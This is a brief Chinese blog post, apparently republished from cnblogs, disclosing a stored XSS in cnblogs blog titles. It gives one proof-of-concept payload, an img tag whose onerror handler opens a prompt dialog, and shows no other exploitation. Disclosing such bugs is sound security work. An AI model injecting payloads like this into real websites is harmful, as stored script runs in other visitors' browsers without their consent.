博客园XSS

时间：2019-06-24 22:27:52 收藏：0 阅读：127

前言

无意间发现博客园标题的存储型XSS。

不过仔细想想，既然都申请了JS权限，想做啥其实都可以。

Payload

<img src=x onerror="prompt('had3s')">

效果

技术分享图片

技术分享图片

原文：https://www.cnblogs.com/17bdw/p/11079850.html

评论（0）

© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com

打开技术之扣，分享程序人生！